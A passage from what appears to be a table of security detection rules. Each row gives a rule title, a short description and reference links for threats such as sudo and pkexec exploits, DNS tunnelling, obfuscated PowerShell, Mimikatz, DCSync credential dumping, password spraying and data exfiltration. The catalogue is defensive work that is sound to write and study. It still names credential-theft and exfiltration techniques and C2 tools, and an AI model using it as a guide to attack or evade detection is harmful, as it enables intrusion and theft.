Detects exploitation attempt of vulnerability described in CVE-2021-3156.
An alternative approach might be to look for flooding of auditd logs due to the brute-forcing
required to trigger the heap-based buffer overflow.
|
https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit |
Potential CVE-2021-4034 Exploitation Attempt |
Detects exploitation attempt of the vulnerability described in CVE-2021-4034. |
https://github.com/berdav/CVE-2021-4034, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034, https://access.redhat.com/security/cve/CVE-2021-4034 |
Use of Debugfs to Access a Raw Disk |
Detects access to a raw disk on a host to evade detection by security products. |
https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA, https://github.com/Neo23x0/auditd/blob/master/audit.rules |
OMIGOD SCX RunAsProvider ExecuteScript |
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with a scx* prefix. It is then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file has the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. |
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/, https://github.com/Azure/Azure-Sentinel/pull/3071/files |
Failed Logins with Different Accounts from Single Source - Linux |
Detects suspicious failed logins with different user accounts from a single source system |
None |
Privilege Escalation Preparation |
Detects suspicious shell commands indicating the information gathering phase in preparation for privilege escalation. |
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/, https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/, https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml |
Possible DNS Tunneling |
Normally, DNS logs contain a limited number of different DNS queries for a single domain. This rule detects a high number of queries for a single domain, which can be an indicator that DNS is used to transfer data. |
https://zeltser.com/c2-dns-tunneling/, https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/ |
High DNS Bytes Out |
High volume of DNS query bytes from a host in a short period of time |
None |
High NULL Records Requests Rate |
Extremely high rate of NULL record type DNS requests from a host in a short period of time. Possible result of iodine tool execution |
None |
High DNS Requests Rate |
High number of DNS requests from a host in a short period of time |
None |
High DNS subdomain requests rate per domain |
High rate of unique Fully Qualified Domain Name (FQDN) requests per root domain (eTLD+1) in a short period of time |
None |
High TXT Records Requests Rate |
Extremely high rate of TXT record type DNS requests from a host in a short period of time. Possible result of Do-exfiltration tool execution |
None |
Large domain name request |
Detects large DNS domain names |
None |
High DNS Bytes Out - Firewall |
High volume of DNS query bytes from a host in a short period of time |
None |
High DNS Requests Rate - Firewall |
High number of DNS requests from a host in a short period of time |
None |
Network Scans Count By Destination IP |
Detects many failed connection attempts to different ports or hosts |
None |
Possible DNS Rebinding |
Detects DNS answers with a TTL below 10. |
https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 |
Network Scans Count By Destination Port |
Detects many failed connection attempts to different ports or hosts |
None |
Multiple Modsecurity Blocks |
Detects multiple blocks by the mod_security module (Web Application Firewall) |
None |
Multiple Suspicious Resp Codes Caused by Single Client |
Detects possible exploitation activity or bugs in a web application |
None |
Invoke-Obfuscation CLIP+ Launcher |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation |
Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework (see the reference section for the code block) |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Possible DNS Rebinding |
Detects several different DNS answers for one domain with IPs from internal and external networks. Normally, DNS answers contain a TTL above 100 (the DNS record is saved in the host cache for the duration of the TTL). |
https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 |
Invoke-Obfuscation VAR+ Launcher |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Meterpreter or Cobalt Strike Getsystem Service Installation |
Detects the use of the Meterpreter/Cobalt Strike getsystem command by detecting a specific service installation |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
Tap Driver Installation |
Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques. |
None |
File Creation by Office Applications |
This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Mimikatz In-Memory |
Detects certain DLL loads when Mimikatz gets executed |
https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/ |
Execution via CL_Invocation.ps1 (2 Lines) |
Detects Execution via SyncInvoke in CL_Invocation.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424 |
Execution via CL_Mutexverifiers.ps1 (2 Lines) |
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600 |
Silence.Downloader V3 |
Detects Silence downloader. These commands are hardcoded into the binary. |
None |
Automated Turla Group Lateral Movement |
Detects automated lateral movement by Turla group |
https://securelist.com/the-epic-turla-operation/65545/ |
DNSCat2 Powershell Implementation Detection Via Process Creation |
The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. |
https://github.com/lukebaggett/dnscat2-powershell, https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html, https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html |
Reconnaissance Activity Using BuiltIn Commands |
Detects execution of a set of builtin commands often used in recon stages by different attack groups |
https://twitter.com/haroonmeer/status/939099379834658817, https://twitter.com/c_APT_ure/status/939475433711722497, https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html |
Quick Execution of a Series of Suspicious Commands |
Detects multiple suspicious processes in a limited timeframe |
https://car.mitre.org/wiki/CAR-2013-04-002 |
MSI Spawned Cmd and Powershell Spawned Processes |
This rule looks for the Windows Installer service (msiexec.exe) spawning a command line shell and/or PowerShell that in turn spawns other processes |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg, https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment |
Always Install Elevated Parent Child Correlated |
This rule looks for any low-privileged process launching the Windows Installer service (msiexec.exe) to install MSI packages with SYSTEM privileges |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg |
Files Dropped to Program Files by Non-Privileged Process |
Searches for files dropped into the Windows/Program Files folders by non-privileged processes |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg |
Stored Credentials in Fake Files |
Searches for access to fake files with stored credentials |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-13-638.jpg |
Dumping ntds.dit remotely via DCSync |
Detects retrieval of ntds.dit via synchronisation with a legitimate domain controller using the Directory Replication Service Remote Protocol |
https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Dumping ntds.dit remotely via NetSync |
Detects retrieval of ntds.dit (computer accounts only) via synchronisation with a legitimate domain controller using the Netlogon Remote Protocol |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Windows Kernel and 3rd-Party Drivers Exploits Token Stealing |
Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level |
https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment |
Malicious Service Installations |
Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. |
https://awakesecurity.com/blog/threat-hunting-for-paexec/, https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html, https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf |
Metasploit Or Impacket Service Installation Via SMB PsExec |
Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation |
https://bczyz1.github.io/2021/01/30/psexec.html |
Detection of Possible Rotten Potato |
Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ |
Remote Schtasks Creation |
Detects remote execution via scheduled task creation or update on the destination host |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Enumeration via the Global Catalog |
Detects enumeration of the global catalog (which can be performed using BloodHound or other AD reconnaissance tools). Adjust the threshold according to domain size. |
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156 |
Rare Schtasks Creations |
Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code |
None |
Password Spraying via Explicit Credentials |
Detects a single user failing to authenticate to multiple users using explicit credentials. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Multiple Users Failing to Authenticate from Single Process |
Detects failed logins with multiple accounts from a single process on the system. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying, https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing |
Failed Logins with Different Accounts from Single Source System |
Detects suspicious failed logins with different user accounts from a single source system |
None |
Failed NTLM Logins with Different Accounts from Single Source System |
Detects suspicious failed logins with different user accounts from a single source system |
None |
Valid Users Failing to Authenticate From Single Source Using Kerberos |
Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Disabled Users Failing To Authenticate From Source Using Kerberos |
Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Invalid Users Failing To Authenticate From Source Using Kerberos |
Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Valid Users Failing to Authenticate from Single Source Using NTLM |
Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Invalid Users Failing To Authenticate From Single Source Using NTLM |
Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Multiple Users Remotely Failing To Authenticate From Single Source |
Detects a source system failing to authenticate against a remote host with multiple users. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Suspicious Multiple File Rename Or Delete Occurred |
Detects multiple file rename or delete events occurring within a specified period of time by the same user (these events may indicate ransomware activity). |
https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html |
Possible Remote Password Change Through SAMR |
Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().
"Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see these events.
|
None |
Suspicious Werfault.exe Network Connection Outbound |
Adversaries can migrate Cobalt Strike/Metasploit/C2 beacons on compromised systems into the legitimate werfault.exe process to avoid detection. |
https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ |
Failed Mounting of Hidden Share |
Detects repeated failed (outgoing) attempts to mount a hidden share |
https://twitter.com/moti_b/status/1032645458634653697, https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 |
Rare Service Installations |
Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services |
None |
Rare Scheduled Task Creations |
This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names. |
None |
Domain User Enumeration Network Recon 01 |
Domain user and group enumeration via network reconnaissance.
Seen in APT29 activity and among other common actors and tactics. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.
The rule was created based on the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
|
https://github.com/OTRF/detection-hackathon-apt29, https://github.com/OTRF/detection-hackathon-apt29/issues/37 |
Potential Exfiltration of Compressed Files |
This rule detects potential exfiltration by looking for a few compression extensions in the URI and signs of compression in the MIME type, file type, and HTTP body.
|
https://github.com/OTRF/detection-hackathon-apt29/issues/17 |